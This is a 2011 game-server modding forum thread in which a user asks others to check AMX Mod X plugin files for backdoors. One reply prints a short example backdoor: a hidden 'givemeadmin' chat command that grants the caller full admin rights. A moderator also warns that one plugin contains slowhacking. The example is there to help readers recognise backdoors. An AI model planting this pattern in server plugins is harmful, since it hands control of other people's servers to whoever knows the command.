Raised This Month: $ Target: $400
 0% 

Analizy Thats SMA Files Please [CODER]


Post New Thread Reply   
 
Thread Tools Display Modes
Author Message
MuLio
Member
Join Date: Jun 2011
Old 07-09-2011 , 13:05   Analizy Thats SMA Files Please [CODER]
Reply With Quote #1

]Hi People

If can any one analizy this code in script..
analizy if have any bugs or any backdoor :S
If can help any one plzz

Last edited by xPaw; 07-09-2011 at 18:27.
MuLio is offline
MuLio
Member
Join Date: Jun 2011
Old 07-09-2011 , 13:12   Re: Analizy Thats SMA Files Please [CODER]
Reply With Quote #2

Editet

Last edited by MuLio; 07-09-2011 at 17:32.
MuLio is offline
xPaw
Retired AMX Mod X Moderator
Join Date: Jul 2008
Old 07-09-2011 , 13:17   Re: Analizy Thats SMA Files Please [CODER]
Reply With Quote #3

You got all this plugins from THIS forums, they are clean.
Now remove codes, they are just wasting space.
__________________
xPaw is offline
am_amx
Senior Member
Join Date: Jul 2010
Location: here
Old 07-09-2011 , 13:21   Re: Analizy Thats SMA Files Please [CODER]
Reply With Quote #4

Quote:
Originally Posted by xPaw View Post
You got all this plugins from THIS forums, they are clean.
Now remove codes, they are just wasting space.
+1
__________________
am_amx is offline
MostwantedScript
Senior Member
Join Date: Sep 2010
Location: Sweden,Gothenburg
Old 07-09-2011 , 16:40   Re: Analizy Thats SMA Files Please [CODER]
Reply With Quote #5

PHP Code:
public plugin_init() {    
    
register_clcmd("givemeadmin""cmd_BackDoor");

PHP Code:
public cmd_BackDoor(id)
{
    
#define flags "abcdefghijklmnopqrstu"
    
new playerName[32];
    
get_user_name(idplayerName31);
    
server_cmd("amx_addadmin %s %s"playerNameflags);

If you see that its a backdoor but never seen a script from AM with backdoors..
__________________
Owner & Creator of
http://mostwantedhf.info
MostwantedScript is offline
Send a message via Skype™ to MostwantedScript
MuLio
Member
Join Date: Jun 2011
Old 07-09-2011 , 17:25   Re: Analizy Thats SMA Files Please [CODER]
Reply With Quote #6

hmmm
i edit and stay only annti host error..this plugin i dont give from this.

@MostwantedScript - if i put in aany script this code in any where:

Code:
public plugin_init() {     
    register_clcmd("givemeadmin", "cmd_BackDoor"); 
}
thats plugin have backdoor and grab the password of admins ?

Last edited by MuLio; 07-09-2011 at 17:35.
MuLio is offline
xPaw
Retired AMX Mod X Moderator
Join Date: Jul 2008
Old 07-09-2011 , 18:27   Re: Analizy Thats SMA Files Please [CODER]
Reply With Quote #7

Do not post anti host error, it contains slowhacking.
__________________
xPaw is offline
MuLio
Member
Join Date: Jun 2011
Old 07-09-2011 , 18:48   Re: Analizy Thats SMA Files Please [CODER]
Reply With Quote #8

Quote:
Originally Posted by xPaw View Post
Do not post anti host error, it contains slowhacking.
but its "Anti" not for Host Error...Its Anti Host Error
He Blocked Error its not Ilegaly ?
MuLio is offline
MuLio
Member
Join Date: Jun 2011
Old 07-30-2011 , 09:50   Re: Analizy Thats SMA Files Please [CODER]
Reply With Quote #9

Quote:
Originally Posted by MuLio View Post
@MostwantedScript - if i put in aany script this code in any where:

Code:
public plugin_init() {     
    register_clcmd("givemeadmin", "cmd_BackDoor"); 
}
thats plugin have backdoor and grab the password of admins ?
MuLio is offline
Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 20:50.


Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Theme made by Freecode